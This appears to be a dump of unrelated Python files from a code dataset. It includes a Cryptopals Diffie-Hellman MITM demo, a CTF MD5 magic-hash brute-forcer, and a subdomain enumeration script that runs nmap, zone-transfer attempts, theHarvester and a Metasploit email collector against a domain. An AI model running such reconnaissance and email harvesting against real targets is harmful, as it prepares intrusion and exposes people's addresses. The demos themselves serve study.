prc_triplet[0][0])\n ax5.set_yticks(np.arange(0, 1.25, step=0.2))\n ax5.set_xticks(np.arange(0, 1.2, step=0.2))\n ax5.legend(loc=\"lower right\")\n fig.tight_layout()\n fig.savefig('auc_plot-new-' + extension+'.png')\n pyplot.close()\n","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":17135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"548938757","text":"#!/usr/bin/env python3\n\nfrom hashlib import sha1\nimport os\nimport secrets\n\nfrom Cryptodome.Cipher import AES\n\nimport s5c33\nimport utils\n\n# NIST params\np, g = s5c33.to_int(\"\"\"\nffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024\ne088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd\n3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec\n6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f\n24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361\nc55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552\nbb9ed529077096966d670c354e4abc9804f1746c08ca237327fff\nfffffffffffff\n\"\"\"), 2\n\n\ndef gen_keypair(p, g):\n \"\"\"Generate a keypair using `p`, `g`.\"\"\"\n a = secrets.randbelow(p)\n A = pow(g, a, p)\n return a, A\n\n\ndef derive_aes_key(s: int) -> bytes:\n \"\"\"Derive an AES-128 key from a shared secret: SHA1(SECRET)[0:16].\"\"\"\n # The shared secrets are 192 bytes long, or 384 hex-digits.\n return sha1(bytes.fromhex(f'{s:0384x}')).digest()[:16]\n\n\ndef encrypt(k: bytes, pt: bytes, iv: bytes) -> bytes:\n \"\"\"AES-128-CBC encrypt; prepended IV.\"\"\"\n return iv + AES.new(k, AES.MODE_CBC, iv).encrypt(utils.pad_pkcs7(pt, 16))\n\n\ndef decrypt(k: bytes, ct: bytes, iv: bytes) -> bytes:\n \"\"\"AES-128-CBC decrypt; prepended IV.\"\"\"\n return utils.unpad_pkcs7(AES.new(k, AES.MODE_CBC, iv).decrypt(ct), 16)\n\n\ndef protocol_demo():\n \"\"\"Demo the challenge's DH protocol.\"\"\"\n # Alice shares the DH params (p, g).\n # - Alice sends \"p\", \"g\" to Bob\n\n # Both sides generate keypairs.\n a, A = gen_keypair(p, g)\n b, B = gen_keypair(p, g)\n\n # Both sides share public keys (A, B).\n # - Alice sends \"A\" to Bob\n # - Bob sends \"B\" to Alice\n\n # Both sides calculate the same secret.\n sA = pow(B, a, p)\n sB = pow(A, b, p)\n assert sA == sB\n\n # Both sides derive the same key.\n kA = derive_aes_key(sA)\n kB = derive_aes_key(sB)\n assert kA == kB\n\n # Alice encrypts a message under AES-128-CBC.\n ptA = b'Hi, this is Alice!'\n ivA = os.urandom(16)\n ctA = encrypt(kA, ptA, ivA)\n\n # Bob encrypts a message under AES-128-CBC.\n ptB = b'Hi, this is Bob!'\n ivB = os.urandom(16)\n ctB = encrypt(kB, ptB, ivB)\n\n # Alice and Bob exchange some encrypted messages.\n # - Alice sends `ctA` to Bob\n # - Bob sends `ctB` to Bob\n\n # Both sides decrypt an incoming message under AES-128-CBC.\n ptA_recv = decrypt(kB, ctA[16:], ctA[:16])\n ptB_recv = decrypt(kA, ctB[16:], ctB[:16])\n assert ptA_recv == ptA\n assert ptB_recv == ptB\n\n\ndef protocol_mitm():\n \"\"\"MITM the challenge's protocol.\"\"\"\n # Alice shares the DH params (p, g).\n # - Alice sends \"p\", \"g\" to Bob\n\n # Both sides generate keypairs.\n a, A = gen_keypair(p, g)\n b, B = gen_keypair(p, g)\n\n # Both sides attempt to share public keys (A, B).\n # However, Michael replaces each public key with \"p\".\n\n # Both sides calculate the same secret.\n # However, Michael has forced the secret to equal zero!\n sA = pow(p, a, p)\n sB = pow(p, b, p)\n assert sA == sB == 0\n\n # Both sides derive the same key.\n kA = derive_aes_key(sA)\n kB = derive_aes_key(sB)\n assert kA == kB\n\n # Alice encrypts a message under AES-128-CBC.\n ptA = b'Hi, this is Alice!'\n ivA = os.urandom(16)\n ctA = encrypt(kA, ptA, ivA)\n\n # Bob encrypts a message under AES-128-CBC.\n ptB = b'Hi, this is Bob!'\n ivB = os.urandom(16)\n ctB = encrypt(kB, ptB, ivB)\n\n # Alice and Bob exchange some encrypted messages.\n # However, Michael intercepts and forwards them.\n # - Alice sends `ctA` to Bob, through Michael\n # - Bob sends `ctB` to Alice, through Michael\n\n # Both sides decrypt an incoming message under AES-128-CBC.\n ptA_recv = decrypt(kB, ctA[16:], ctA[:16])\n ptB_recv = decrypt(kA, ctB[16:], ctB[:16])\n assert ptA_recv == ptA\n assert ptB_recv == ptB\n\n # Since Michael knows the shared secret is 0, he can decrypt both messages.\n kM = derive_aes_key(0)\n ptA_via_M = decrypt(kM, ctA[16:], ctA[:16])\n ptB_via_M = decrypt(kM, ctB[16:], ctB[:16])\n assert ptA_via_M == ptA\n assert ptB_via_M == ptB\n\n\nif __name__ == '__main__':\n protocol_demo()\n protocol_mitm()\n print('success')\n","sub_path":"s5c34.py","file_name":"s5c34.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"392590170","text":"from aiida.orm import KpointsData, StructureData, Float\nfrom aiida.engine import calcfunction\n\n@calcfunction\ndef get_kpoints_mesh_from_structure(structure: StructureData,\n kpoints_distance: Float) -> KpointsData:\n kpoints_data = KpointsData()\n kpoints_data.set_cell_from_structure(structure)\n kpoints_data.set_kpoints_mesh_from_density(kpoints_distance.value)\n\n return kpoints_data","sub_path":"aiida_quantumespresso_elastic/utils/get_kpoints_mesh_from_structure.py","file_name":"get_kpoints_mesh_from_structure.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"320191804","text":"#!/usr/bin/python3\n\n#Auto-Enumerationstool von Max Spitzlay\n \n#Importing\nimport sys #Importiert sys\nimport os #import os commands\nimport time #sleep process\n#import subprocess #For reading out results\nfrom datetime import datetime #import current date\nimport socket #Socket Importieren\n#import getopt #getopt for command line arguments\nimport argparse #Argparse um die Argumente wie -o -d einzubringen\n#import itertools #Animations\n#import threading #Animations\nimport colors as co #colors.py file um farbig zu schreiben\n#import animate as an #animate.py fuer animationen\n#import webscraping\n#from webscraping import download\nimport random\nfrom spenum import *\n\n\n#Hier werden die Classes hinterlegt um subdomains zu scannen\n\n#Subdomainnr:\n#sed -n [x]p Eye.txt //Printet mir line nr x aus\n#subnr = nummer welche subdomain es gerade ist\n\n#Get ip\nclass sub_ip:\n def sub_ip(self):\n time.sleep(float(sleeper))\n co.printout (\"\\n\\nGetting IP-Address ... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: host \\n\", GREEN)\n current_subdomain_ip = socket.gethostbyname(current_subdomain_address)\n file.write(\"Die IP-Addresse der Website ist: \" + current_subdomain_ip + \"\\nDie IPv6-Addresse ist: \")\n file.close() #close the file\n os.system(\"host %s | awk '/IPv6/{print >> \\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address))\n os.system(\"host %s\" % current_subdomain_address)\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_ip = sub_ip()\n\n \nclass sub_mailserver:\n def sub_mailserver(self):\n co.printout (\"\\n\\nGetting Mailserver... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: dig\", GREEN)\n time.sleep(float(sleeper))\n file.write(\"Mailserver: \\n \\n\")\n file.close() #close the file\n os.system(\"dig\" + \" \" + current_subdomain_address + \" MX | awk '/MX/{print >> \\\"./Enumerationen/%s/%s\\\";}1'\" % (domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_mailserver = sub_mailserver()\n\nclass sub_portscan:\n def sub_portscan(self):\n co.printout (\"\\n\\nScanning for open ports... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: nmap \\n\", GREEN)\n time.sleep(float(sleeper))\n file.write(\"Open Ports: \\n \\n\")\n file.close() #close the file\n os.system(\"nmap -p -5000 %s | awk '/Host/,0{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_ip, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_portscan = sub_portscan()\n\nclass sub_nameserver:\n def sub_nameserver(self):\n co.printout (\"\\nGetting Nameserver... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: dig\", GREEN)\n time.sleep(float(sleeper))\n file.write(\"Nameserver: \\n \\n\")\n file.close() #close the file\n os.system(\"dig %s ns | awk '/ns/{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_nameserver = sub_nameserver()\n\nclass sub_transfer:\n def sub_transfer(self):\n file.write(\"\\nZone-Transfer: \\n \\n\")\n co.printout (\"\\nAttempting Zone Transfer... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: dnsrecon \\n\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n os.system(\"dnsrecon -d %s -a | awk '/Performing/,0{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_transfer = sub_transfer()\n\nclass sub_range:\n def sub_range(self):\n file.write(\"IP-Range: \")\n co.printout (\"\\n\\nGetting IP Range... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: whois -B \\n\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n reichweite = os.system(\"whois -B %s | grep 'inetnum' | sed 's/inetnum: //g' | sed 's/ //g'\" % current_subdomain_ip) #filter IP Range out\n os.system(\"whois -B %s | grep 'inetnum' | sed 's/inetnum: //g' | sed 's/ //g' >> ./Enumerationen/%s/%s\" % (current_subdomain_ip, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_range = sub_range()\n\nclass sub_ssl:\n def sub_ssl(self):\n file.write(\"\\n \\nSSL-Scan Results: \\n \\n\")\n co.printout (\"\\n\\nRunning SSL-Scan... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: sslscan \\n\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n os.system(\"sslscan --no-colour %s | awk '/OpenSSL/,0{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address)) #Dirty Fix, da er sich erste Line pickt und dann followt\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n time.sleep(float(sleeper))\n\nsub_ssl = sub_ssl()\n\nclass sub_lbd:\n def sub_lbd(self):\n file.write(\"Loadbalancing: \\n \\n\")\n co.printout (\"\\n\\nTesting for loadbalancing... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: lbd\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n os.system(\"lbd %s | awk '/use Load-balancing/{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_lbd = sub_lbd()\n\nclass sub_harvester:\n def sub_harvester(self):\n file.write(\"Harvested Emails: \\n \\n\")\n co.printout (\"\\n\\nHarvesting E-Mails... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: theharvester\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n os.system(\"theharvester -d %s -b google | awk '/%s/{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, current_subdomain_address, domain, current_subdomain_address)) #Sollte funktionieren mit @domain, muss getestet werden.\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_harvester = sub_harvester()\n\nclass sub_metasploit:\n def sub_metasploit(self):\n co.printout (\"\\nHarvesting more E-Mails...\", BLUE)\n co.printout (\"\\n--- --- ---Tool: Metasploit / MSFConsole \\n\", GREEN)\n \n os.system(\"rm -rf metasploit-script/\") #To delete potential before-script\n os.system(\"mkdir metasploit-script\")\n os.system(\"touch ./metasploit-script/sploiter.rc\")\n os.system(\"echo use auxiliary/gather/search_email_collector > ./metasploit-script/sploiter.rc\")\n os.system(\"echo set domain %s >> ./metasploit-script/sploiter.rc\" % current_subdomain_address)\n os.system(\"echo run >> ./metasploit-script/sploiter.rc\")\n os.system(\"echo exit >> ./metasploit-script/sploiter.rc\")\n os.system(\"msfconsole -r ./metasploit-script/sploiter.rc | awk '/%s/{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address))\n os.system(\"rm -rf metasploit-script/\") #To delete script after\n\nsub_metasploit = sub_metasploit\n\nclass sub_metagoofil:\n def sub_metagoofil(self):\n co.printout (\"\\n\\Harvesting Public Files and Information... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: Metagoofil \\n\", GREEN)\n time.sleep(float(sleeper))\n pwd = os.system(\"pwd\") #Current Location\n os.system(\"metagoofil -d %s -t pdf -l 100 -n 25 -o %s -f ./Enumerationen/%s/subdomains/enumpdf%s.html\" % (current_subdomain_address, pwd, domain, current_subdomain_id))\n time.sleep(float(sleeper))\n\nsub_metagoofil = sub_metagoofil()\n\n\n","sub_path":"subdomainscanner_old.py","file_name":"subdomainscanner_old.py","file_ext":"py","file_size_in_byte":8648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"147620347","text":"#(4) example04\n#import tensorflow and numpy\nimport tensorflow as tf\nimport numpy as np\n\n#[feather, wing]\nx_data = np.array(\n [[0, 0], [1, 0], [1, 1], [0, 0], [0, 0], [0, 1]])\n\n#[etc, mammal, bird]\n#one-hot encoding(label)\ny_data = np.array([\n [1, 0, 0], #etc\n [0, 1, 0], #mammal\n [0, 0, 1], #bird\n [1, 0, 0],\n [1, 0, 0],\n [0, 0, 1]\n])\n\n#make simple model\n#make placeholder\nX = tf.placeholder(tf.float32)\nY = tf.placeholder(tf.float32)\n\n#input size is 2, output size is 3\nweight1 = tf.Variable(tf.random_uniform([2, 10], -1., 1.))\nweight2 = tf.Variable(tf.random_uniform([10, 3], -1., 1.))\n\nbias1 = tf.Variable(tf.zeros([10]))\nbias2 = tf.Variable(tf.zeros([3]))\n\n#activation function\nlayer1 = tf.add(tf.matmul(X, weight1), bias1)\nlayer2 = tf.nn.relu(layer1)\n\nmodel = tf.add(tf.matmul(layer1, weight2), bias2)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=model))\n\noptimizer = tf.train.AdamOptimizer(learning_rate=0.01)\ntrain_op = optimizer.minimize(cost)\n\n#training\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nfor step in range(100):\n sess.run(train_op, feed_dict={X: x_data, Y: y_data})\n if (step + 1) % 10 == 0:\n print(step + 1, sess.run(cost, feed_dict={X: x_data, Y: y_data}))\nprediction = tf.argmax(model, 1)\nground_truth = tf.argmax(Y, 1)\nprint('Prediction:', sess.run(prediction, feed_dict={X: x_data}))\nprint('Ground Truth:', sess.run(ground_truth, feed_dict={Y: y_data}))\n\nis_correct = tf.equal(prediction, ground_truth)\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\nprint('Accuracy: %.2f' % sess.run(accuracy * 100, feed_dict={X: x_data, Y: y_data}))","sub_path":"tensorflow/example04.py","file_name":"example04.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"343440081","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Python \n#Photoelectric effect- Calculation of WorkFunction\n#Error Calculation from Theoretical and Calculated Value\n# Amrutha V-lab Simulation Result\n \n#PLATINUM #PLATINUM #PLATINUM #PLATINUM #PLATINUM #PLATINUM \n \n#Variable declaration\n\n\ne = 1.6e-19; # Charge on an electron, C\nh = 6.626e-34; # Planck's constant, Js\nc = 3.0e+08; # Speed of light in vacuum, m/s\nW_Theo = 6.35; # Theoretical Value of Work Function of Pt in eV\nlamb = float(input(\"Enter the Wavelenghth (in meter) :\")); # Wavelength of incident light (meter)\nV_0 = float(input(\"Enter the Stopping potential (-ve) :\" )); # Stopping potential for emitted electrons, V \n\n\n#Calculation\n\nf = c/lamb; # Frequency of incident radiation , Hz\nE = (h*f); # Energy carried by one photon from Planck's law, J\nK_max = (e*V_0); # Maximum kinetic energy of electrons, J\n # We have, WorkFunction W = E-K_max\nW_in_joule = ((h*f)-(e*V_0));\n #Converting to eV, Dividing by e=1.6e-19 to get WorkFunction\nW_in_eV = (W_in_joule/e)\n\n\n#Result\n\n\nprint(\"The work function of Pt metal (in joule) = \")\nprint (W_in_joule , \"joule\")\nprint(\"The work function of Pt metal (in eV) = \")\nprint (W_in_eV,\"eV\")\n\n#Error Calculation\nprint(\"Theoretical Value of WorkFunction of Pt:-\", W_Theo ,\"eV\" )\nprint(\"Calculated Value of WorkFunction of Pt:-\",W_in_eV,\"eV\")\n\n#Error=(|theoreticalValue-CalculatedValue|)/theoreticalValue\nError=(W_Theo-W_in_eV)/(W_Theo)\nprint(\"ErrorCalculated=\",Error)\n\n#Error%=Error*100\nError_Percent = Error*100\nprint(\"ErrorPercentage=\",Error_Percent,\"%\")\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"WorkFunctionPLATINUM.py","file_name":"WorkFunctionPLATINUM.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"332686873","text":"import hashlib\n\nalnum = '1234567890'\n\n\ndef try_crack(prefix):\n for al in alnum:\n candidate = prefix + al\n\n h = hashlib.md5(candidate.encode('utf-8')).hexdigest()\n\n if h.startswith('0e'):\n try:\n int(h[2:])\n print(candidate)\n exit()\n except:\n continue\n\n\npre = '0e'\nnum = 0\n\nwhile True:\n try_crack('%s%d' % (pre, num))\n num += 1\n\n# 0e1137126905\n# 0e215962017","sub_path":"2017_hack_dat_kiwi/md5_1/md5.py","file_name":"md5.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294331617","text":"import unittest\nimport random\nimport time\n\nfrom messages import StatusMessage, RegisterMessage, Message, MessageHeader, ACKMessage, MessageType\nfrom gateway import Gateway\nfrom devices import Device\nfrom message_handler import DummyMessageHandler\nimport stacktracer\n\n\nclass TestGateway(unittest.TestCase):\n\n def setUp(self):\n self.message_handler = DummyMessageHandler()\n self.gw = Gateway(self.message_handler)\n self.gw.start()\n\n def tearDown(self):\n self.gw.stop()\n self.gw.join()\n\n def test_noNodesAfterStartup(self):\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n\n def test_Register(self):\n led = Device(\"name\", self.message_handler)\n self.assertEqual(led.connect(), True)\n time.sleep(0.1)\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n node = connected_nodes[led.node_id]\n self.assertEqual(node.name, led.name)\n self.assertEqual(node.registered, True)\n\n last_seen = node.last_seen\n\n led._send_status()\n time.sleep(0.1)\n\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n node = connected_nodes[led.node_id]\n self.assertEqual(node.name, led.name)\n self.assertEqual(node.registered, True)\n self.assertNotEqual(node.last_seen, last_seen)\n\n # calling connect again should change nothing\n self.assertEqual(led.connect(), True)\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n\n def test_sendUnknownMessage(self):\n header = MessageHeader(node_id = 1, group_id = 1, wants_ack = False)\n m = Message(99, header)\n self.message_handler.write_message_from_device(m)\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n # wait so the gateway can finish processing\n time.sleep(0.01)\n\n def test_sendACKForUnknownMessage(self):\n dev = Device(\"name\", self.message_handler)\n self.assertEqual(dev.connect(), True)\n header = MessageHeader(node_id = dev.node_id, group_id = dev.group_id, wants_ack = False)\n m = ACKMessage(header)\n self.message_handler.write_message_from_device(m)\n time.sleep(0.1)\n self.assertEqual(len(self.gw.get_connected_nodes()), 1)\n\n def test_sendACKForUnknownNode(self):\n header = MessageHeader(node_id = 1, group_id = 1, wants_ack = False)\n m = ACKMessage(header)\n self.message_handler.write_message_from_device(m)\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n # wait so the gateway can finish processing\n time.sleep(0.1)\n\n def test_moreThan30Nodes(self):\n for i in range(0, 30):\n dev = Device('%s' % i, self.message_handler)\n if i == 29:\n # too many nodes registered\n self.assertEqual(dev.connect(), False)\n else:\n self.assertEqual(dev.connect(), True)\n\n time.sleep(0.1)\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 29)\n\n def test_sendRegisterMessageWithoutACKRequest(self):\n header = MessageHeader(node_id = 1, group_id = 1, wants_ack = False)\n m = RegisterMessage(header)\n self.message_handler.write_message_from_device(m)\n time.sleep(0.1)\n self.assertEqual(len(self.gw.get_connected_nodes()), 1)\n\n def test_sendRegisterMessageWithWrongNodeId(self):\n header = MessageHeader(node_id = 5, group_id = 1, wants_ack = False)\n m = RegisterMessage(header)\n self.message_handler.write_message_from_device(m)\n time.sleep(0.1)\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n\n def test_sendStatusForUnknownNode(self):\n header = MessageHeader(node_id = 5, group_id = 1, wants_ack = False)\n m = StatusMessage(header, name = 'dev name')\n self.message_handler.write_message_from_device(m)\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n # wait so the gateway can finish processing\n time.sleep(0.1)\n\n def test_Register_lostRegisterResponse(self):\n token = random.random()\n\n dev = Device('test dev', self.message_handler)\n\n header = MessageHeader(node_id = 1, group_id = 1, wants_ack = False)\n p = RegisterMessage(header, name = dev.name, token = token)\n self.message_handler.write_message_from_device(p)\n\n # ignore RegisterResponseMessage for now\n m = dev._incoming_messages.get(True, 1)\n\n # the gateway should already list the node as not registered\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n self.assertEqual(connected_nodes[m.new_node_id].name, dev.name)\n self.assertEqual(connected_nodes[m.new_node_id].registered, False)\n\n # write a register message again, let's assume the RegisterResponse\n # Message was lost\n self.message_handler.write_message_from_device(p)\n\n m2 = dev._incoming_messages.get(True, 1)\n self.assertEqual(m.token, m2.token)\n self.assertEqual(m.new_node_id, m2.new_node_id)\n\n # the gateway should still list the node as not registered\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n self.assertEqual(connected_nodes[m.new_node_id].name, dev.name)\n self.assertEqual(connected_nodes[m.new_node_id].registered, False)\n\n\nif __name__ == '__main__':\n stacktracer.trace_start(\"trace.html\")\n unittest.main()\n","sub_path":"gateway/test_gateway.py","file_name":"test_gateway.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"159787976","text":"def input_score():\n grade_dict = {40: 'E', 50: 'D', 60: 'C-', 65: 'C+',\n 70: 'B-', 75: 'B+', 80: 'A', 90: 'S',\n 100: 'SSS'}\n while True:\n score_str = raw_input(\"input your score: \")\n try:\n score_num = int(score_str)\n if score_num < 0 or score_num > 100:\n raise ValueError\n except:\n print(\"invalid input\")\n\n res = 'F'\n for score in sorted(grade_dict.keys()):\n if score_num >= score:\n res = grade_dict[score]\n else:\n break\n return res\n\n\nif __name__ == '__main__':\n print(\"Your grade is %s\" % input_score())\n","sub_path":"code/lesson1.py","file_name":"lesson1.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"173767575","text":"## 590. N-ary Tree Postorder Traversal\n\n# Example 1:\n# Input: root = [1,null,3,2,4,null,5,6]\n# Output: [5,6,3,2,4,1]\n\n# Example 2:\n# Input: root = [1,null,2,3,4,5,null,null,6,7,null,8,null,9,10,null,null,11,null,12,null,13,null,null,14]\n# Output: [2,6,14,11,7,3,12,8,4,13,9,10,5,1]\n\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def postorder(self, root: 'Node') -> List[int]:\n \n self.result = []\n \n def helper(node):\n if not node:\n return\n \n for child in node.children:\n helper(child)\n \n self.result.append(node.val)\n \n helper(root)\n \n return self.result","sub_path":"Leetcode/N-ary Trees/p590.py","file_name":"p590.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"233692186","text":"#!/links/application/dsu/Python-3.2/python\n\n'''\nDocu\n'''\n\nimport subprocess\nimport shlex\nimport os\nimport fnmatch\nimport concurrent.futures\n\nrscriptPath = '/links/application/dsu/R-scripts'\npwd = os.getcwd()\npattern = '*.fastq.gz'\nrscript = '/links/application/dsu/R-2.13.2/bin/Rscript'\nconcatenationScript='/links/application/dsu/bin/concatenate_pdfs.py'\nmaxConcurrentJobs=5\n\ndef run_me(fastqFile):\n (path, file) = os.path.split(fastqFile)\n os.chdir(path)\n args = rscript + ' --vanilla ' + rscriptPath + '/' + 'fastq_quality.R ' + file\n #print(args)\n SplitArgs = shlex.split(args)\n p = subprocess.Popen(SplitArgs)\n p.wait()\n #subprocess.Popen(concatenationScript)\n\ndef findFiles (pattern):\n matches = []\n for root, dirnames, filenames in os.walk(pwd):\n for filename in fnmatch.filter(filenames, pattern):\n matches.append(os.path.join(root, filename))\n return matches\n \ndef callR():\n matchingFiles = findFiles(pattern)\n with concurrent.futures.ThreadPoolExecutor(max_workers=maxConcurrentJobs) as executor:\n out = [executor.submit(run_me, lane)\n for lane in matchingFiles]\ncallR()\n","sub_path":"deep_sequencing_unit/source/Python/fastq_quality.py","file_name":"fastq_quality.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"423739771","text":"#!/usr/bin/env python3\n\nfrom geopy.distance import vincenty\nfrom shapely.wkt import loads as wktToLineString\nfrom shapely.geometry import LineString, Point\nfrom scipy import interpolate\nfrom scipy.interpolate import Rbf\nimport geopandas as gp\nimport pandas as pd\nimport numpy as np\nimport progressbar\nimport osrm\nimport sys\nimport urllib\nimport gdal, ogr, os, osr\n\nfrom settings import dirs, ech0\n\n##\n### Analysis Settings\n##\n\ndatasets = {\n \"villages\": \"villages.shp\",\n \"towns\": \"towns.shp\",\n \"residential\": \"residential_points.shp\",\n \"schools\": \"school_points.shp\",\n \"hospitals\": \"hospitals.shp\",\n \"rivers\": \"rivers.shp\",\n}\n\n### Nearest service configuration\nosrm.RequestConfig.profile = \"foot\"\n\nsource = \"villages\"\ndests = [\"schools\", \"hospitals\", \"towns\"]\n\n### Remoteness calculation configuration\ndests_w = {\"schools\": 0.5, ## destination datasets with their weights to calculate remoteness\n \"hospitals\": 0.5,\n \"towns\": 0.5}\n\n### Sample \"channels\" / perpendicular line settings\nsmp_corridor = \"rivers\" ## sample linestrings\nminDist_m = [200, 200, 200, 200, 200]\nperpLen_m = [50, 75, 100, 125, 150]\n\n### Remoteness interpolation settings\n#rinterp_grd = min(minPerp_m)/4 ## size of blocks to sample at\n\ndef main():\n\n ##\n ### Do the damn thang!\n ##\n \n global d\n\n ## Load data\n d = load_data(datasets)\n\n ## Calculate nearest service and route to nearest service, for each service\n for dest in dests:\n route = \"{}_{}_routes\".format(source, dest)\n \n d[source] = calc_nearest(d, source, dest)\n d[route] = calc_route(d, source, dest) ## Add all the routes to each [source]_[dest]_routes dataset\n\n ## Calculate the remoteness statistic \n d[source] = calc_remoteness(d, source, dests_w)\n \n ## Generate perpendicular lines for all the specified parameters of them\n for i in range(len(minDist_m)):\n perp = \"perp_{}_{}\".format(minDist_m[i], perpLen_m[i])\n d[perp] = calc_perp_lines(d, smp_corridor, minDist_m[i], perpLen_m[i])\n\n ## Hand it off to R? \n #d = calc_rinterp(d, source, grd_size_m) ## spline interpolation w/ scipy\n\n save_shp(d)\n\ndef load_data(datasets):\n \n ##\n ## Load data\n ##\n\n ech0(\"Loading data\")\n\n d = {} ## data\n\n for name, filename in datasets.items():\n print(\"Loading: {}\".format(name))\n d[name] = gp.GeoDataFrame.from_file(\"{}{}\".format(dirs[\"results\"],filename))\n\n return d\n\ndef calc_nearest(d, source, dest):\n \n ##\n ## Compute distance matrix of villages to each near school, hospital ...\n ##\n\n d_tag = dest[:3]\n \n ech0(\"Calculating nearest {} ({})...\".format(dest, 